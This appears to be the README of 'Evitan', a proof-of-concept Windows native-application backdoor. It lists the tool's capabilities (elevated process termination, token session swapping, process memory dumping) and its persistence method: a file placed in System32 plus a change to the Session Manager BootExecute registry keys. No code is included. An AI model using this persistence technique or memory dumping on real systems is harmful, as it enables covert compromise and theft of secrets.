A Native Application Subsystem backdoor.
- Elevated Process / Thread Termination
- Token Session ID Swapping
- Process Memory Dumping
Backdooring a system with Evitan requires a way to:
- Write a file to C:\Windows\System32.
- Modify the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute or HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecuteNoPnpSync registry keys.
Evitan's inner workings are described in its accompanying blog post which can be found here.
- Pavel's NativeApps
- Pavel's SECArmy Village Grayhat 2020 Presentation
- Protexity's Going Native Blog Post
This code and the blog post are provided only as a POC and are not expected to be production-grade, bug-free code. Please take this into consideration before utilizing Evitan. Moreover, the NativeRun application included in the Evitan project (utilized for easily running Native Applications for testing purposes) is borrowed from Pavel's NativeApps project. It is not required for running Evitan and is only included to facilitate its testing (all credits regarding NativeRun go to the original author).
Join the Hackcraft community discord server here. On the server you can receive support and discuss issues related to Evitan.